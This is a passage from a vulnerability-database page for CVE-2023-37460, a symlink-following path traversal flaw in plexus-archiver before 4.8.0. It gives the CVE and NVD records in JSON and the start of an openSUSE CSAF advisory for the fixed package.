Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2023-37460 (GCVE-0-2023-37460)
Vulnerability from cvelistv5 – Published: 2023-07-25 19:41 – Updated: 2024-10-03 19:09
VLAI?
EPSS
Summary
Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink's source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry's content to the symlink's target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.
Severity ?
8.1 (High)
CWE
Assigner
References
| URL | Tags | ||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| codehaus-plexus | plexus-archiver |
Affected:
< 4.8.0
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T17:16:29.488Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "plexus-archiver",
"vendor": "codehaus-plexus",
"versions": [
{
"lessThan": "4.8.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-37460",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-03T19:09:14.939906Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-03T19:09:55.667Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "plexus-archiver",
"vendor": "codehaus-plexus",
"versions": [
{
"status": "affected",
"version": "\u003c 4.8.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-61",
"description": "CWE-61: UNIX Symbolic Link (Symlink) Following",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-25T19:41:46.096Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2"
},
{
"name": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0"
}
],
"source": {
"advisory": "GHSA-wh3p-fphp-9h2m",
"discovery": "UNKNOWN"
},
"title": "Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2023-37460",
"datePublished": "2023-07-25T19:41:46.096Z",
"dateReserved": "2023-07-06T13:01:36.997Z",
"dateUpdated": "2024-10-03T19:09:55.667Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"4.8.0\", \"matchCriteriaId\": \"9C596F2F-8933-41D5-A4C9-25F5EC82D26A\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}]",
"id": "CVE-2023-37460",
"lastModified": "2024-11-21T08:11:45.130",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.1, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.2, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
"published": "2023-07-25T20:15:13.703",
"references": "[{\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Release Notes\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-22\"}, {\"lang\": \"en\", \"value\": \"CWE-61\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-37460\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-07-25T20:15:13.703\",\"lastModified\":\"2024-11-21T08:11:45.130\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.2,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-22\"},{\"lang\":\"en\",\"value\":\"CWE-61\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.8.0\",\"matchCriteriaId\":\"9C596F2F-8933-41D5-A4C9-25F5EC82D26A\"}]}]}],\"references\":[{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Release Notes\"]},{\"url\":\"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"name\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"name\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"name\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T17:16:29.488Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-37460\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-10-03T19:09:14.939906Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:codehaus-plexus:plexus-archiver:*:*:*:*:*:*:*:*\"], \"vendor\": \"codehaus-plexus\", \"product\": \"plexus-archiver\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"4.8.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-10-03T19:09:51.358Z\"}}], \"cna\": {\"title\": \"Plexus Archiver vulnerable to Arbitrary File Creation in AbstractUnArchiver\", \"source\": {\"advisory\": \"GHSA-wh3p-fphp-9h2m\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"HIGH\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"codehaus-plexus\", \"product\": \"plexus-archiver\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.8.0\"}]}], \"references\": [{\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"name\": \"https://github.com/codehaus-plexus/plexus-archiver/security/advisories/GHSA-wh3p-fphp-9h2m\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"name\": \"https://github.com/codehaus-plexus/plexus-archiver/commit/54759839fbdf85caf8442076f001d5fd64e0dcb2\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"name\": \"https://github.com/codehaus-plexus/plexus-archiver/releases/tag/plexus-archiver-4.8.0\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-61\", \"description\": \"CWE-61: UNIX Symbolic Link (Symlink) Following\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-07-25T19:41:46.096Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-37460\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-10-03T19:09:55.667Z\", \"dateReserved\": \"2023-07-06T13:01:36.997Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-07-25T19:41:46.096Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
OPENSUSE-SU-2024:13309-1
Vulnerability from csaf_opensuse - Published: 2024-06-15 00:00 - Updated: 2024-06-15 00:00Summary
plexus-archiver-4.8.0-2.1 on GA media
Notes
Title of the patch
plexus-archiver-4.8.0-2.1 on GA media
Description of the patch
These are all security issues fixed in the plexus-archiver-4.8.0-2.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2024-13309
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "plexus-archiver-4.8.0-2.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the plexus-archiver-4.8.0-2.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-13309",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_13309-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2023-37460 page",
"url": "https://www.suse.com/security/cve/CVE-2023-37460/"
}
],
"title": "plexus-archiver-4.8.0-2.1 on GA media",
"tracking": {
"current_release_date": "2024-06-15T00:00:00Z",
"generator": {
"date": "2024-06-15T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:13309-1",
"initial_release_date": "2024-06-15T00:00:00Z",
"revision_history": [
{
"date": "2024-06-15T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-4.8.0-2.1.aarch64",
"product": {
"name": "plexus-archiver-4.8.0-2.1.aarch64",
"product_id": "plexus-archiver-4.8.0-2.1.aarch64"
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-4.8.0-2.1.aarch64",
"product": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.aarch64",
"product_id": "plexus-archiver-javadoc-4.8.0-2.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-4.8.0-2.1.ppc64le",
"product": {
"name": "plexus-archiver-4.8.0-2.1.ppc64le",
"product_id": "plexus-archiver-4.8.0-2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-4.8.0-2.1.ppc64le",
"product": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.ppc64le",
"product_id": "plexus-archiver-javadoc-4.8.0-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-4.8.0-2.1.s390x",
"product": {
"name": "plexus-archiver-4.8.0-2.1.s390x",
"product_id": "plexus-archiver-4.8.0-2.1.s390x"
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-4.8.0-2.1.s390x",
"product": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.s390x",
"product_id": "plexus-archiver-javadoc-4.8.0-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "plexus-archiver-4.8.0-2.1.x86_64",
"product": {
"name": "plexus-archiver-4.8.0-2.1.x86_64",
"product_id": "plexus-archiver-4.8.0-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "plexus-archiver-javadoc-4.8.0-2.1.x86_64",
"product": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.x86_64",
"product_id": "plexus-archiver-javadoc-4.8.0-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.aarch64"
},
"product_reference": "plexus-archiver-4.8.0-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.ppc64le"
},
"product_reference": "plexus-archiver-4.8.0-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.s390x"
},
"product_reference": "plexus-archiver-4.8.0-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-4.8.0-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.x86_64"
},
"product_reference": "plexus-archiver-4.8.0-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.aarch64"
},
"product_reference": "plexus-archiver-javadoc-4.8.0-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.ppc64le"
},
"product_reference": "plexus-archiver-javadoc-4.8.0-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.s390x"
},
"product_reference": "plexus-archiver-javadoc-4.8.0-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "plexus-archiver-javadoc-4.8.0-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.x86_64"
},
"product_reference": "plexus-archiver-javadoc-4.8.0-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-37460",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-37460"
}
],
"notes": [
{
"category": "general",
"text": "Plexis Archiver is a collection of Plexus components to create archives or extract archives to a directory with a unified `Archiver`/`UnArchiver` API. Prior to version 4.8.0, using AbstractUnArchiver for extracting an archive might lead to an arbitrary file creation and possibly remote code execution. When extracting an archive with an entry that already exists in the destination directory as a symbolic link whose target does not exist - the `resolveFile()` function will return the symlink\u0027s source instead of its target, which will pass the verification that ensures the file will not be extracted outside of the destination directory. Later `Files.newOutputStream()`, that follows symlinks by default, will actually write the entry\u0027s content to the symlink\u0027s target. Whoever uses plexus archiver to extract an untrusted archive is vulnerable to an arbitrary file creation and possibly remote code execution. Version 4.8.0 contains a patch for this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.aarch64",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.ppc64le",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.s390x",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.x86_64",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.aarch64",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.ppc64le",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.s390x",
"openSUSE Tumbleweed:plexus-archiver-javadoc-4.8.0-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-37460",
"url": "https://www.suse.com/security/cve/CVE-2023-37460"
},
{
"category": "external",
"summary": "SUSE Bug 1215973 for CVE-2023-37460",
"url": "https://bugzilla.suse.com/1215973"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.aarch64",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.ppc64le",
"openSUSE Tumbleweed:plexus-archiver-4.8.0-2.1.s390x",
